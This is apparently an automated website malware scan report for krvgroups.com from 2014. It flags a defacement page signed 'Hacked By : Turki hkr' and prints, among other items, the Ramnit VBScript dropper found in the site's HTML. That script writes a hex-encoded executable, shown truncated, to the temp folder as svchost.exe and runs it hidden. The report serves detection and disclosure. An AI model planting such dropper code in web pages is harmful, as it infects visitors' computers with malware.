New scan:

Malware Scanner report for krvgroups.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked By :   (232 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://krvgroups.com/
200 OK
Content-Length: 238258
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

<!--
DropFileName = 'svchost.exe'
WriteData = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000525B767E163A182D163A182D163A182DD535452D1B3A182D163A192D2E3A182D31FC6A2D173A182D31FC642D173A182D31FC602D173A182D52696368163A182D00000000000000000000000000000000000000000000000050450000
... 3071 bytes are skipped ...
0F4903320F4903320F4903320F4903320F4903320F4903320'
Set FSO = CreateObject('Scripting.FileSystemObject')
DropPath = FSO.GetSpecialFolder(2) & '' & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng('&H' & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject('WScript.Shell')
WSHshell.Run DropPath, 0

Antivirus reports:

AntiVir
HTML/Ramnit.EB
Bkav
MW.Clodf1d.Trojan.5285
Panda
W32/Cosmu.A
nProtect
Trojan.HTML.Ramnit.C
TrendMicro-HouseCall
TROJ_GEN.F47V1115
Emsisoft
Trojan.HTML.Ramnit.C (B)
MicroWorld-eScan
Trojan.HTML.Ramnit.C
F-Secure
Trojan.HTML.Ramnit.C
AVG
VBS/Heur
GData
Trojan.HTML.Ramnit.C
BitDefender
Trojan.HTML.Ramnit.C

Deface/Content modification. The following signature was found: Hacked By :

...[964 bytes skipped]...
cription' content='&#1578;&#1605; &#1575;&#1604;&#1575;&#1582;&#1578;&#1585;&#1575;&#1602; &#1605;&#1606; &#1602;&#1576;&#1604; &#1578;&#1585;&#1603;&#1610; &#1548; &#1607;&#1603;&#1585;'>
</head>

<body bgcolor='#000000'>

<p align='center'><b><font size='4' color='#92815C'>Hacked By : </font>
<font color='#FFFFFF'><font size='4'>Turki hkr</font></font></b></p>
<p align='center'>&nbsp;</p>
<p align='center'>
<img border='0' src='http://im40.gulfup.com/MCgE8.jpg' width='333' height='333'></p>
<p align='center' style='color: rgb(0, 0, 0); font-family: Times New Roman; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-s
...[240614 bytes skipped]...


http://krvgroups.com/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: krvgroups.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 21:08:20 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.4.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: krvgroups.com
Referer: http://www.google.com/search?q=krvgroups.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=krvgroups.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://krvgroups.com/

Result: krvgroups.com is not infected or malware details are not published yet.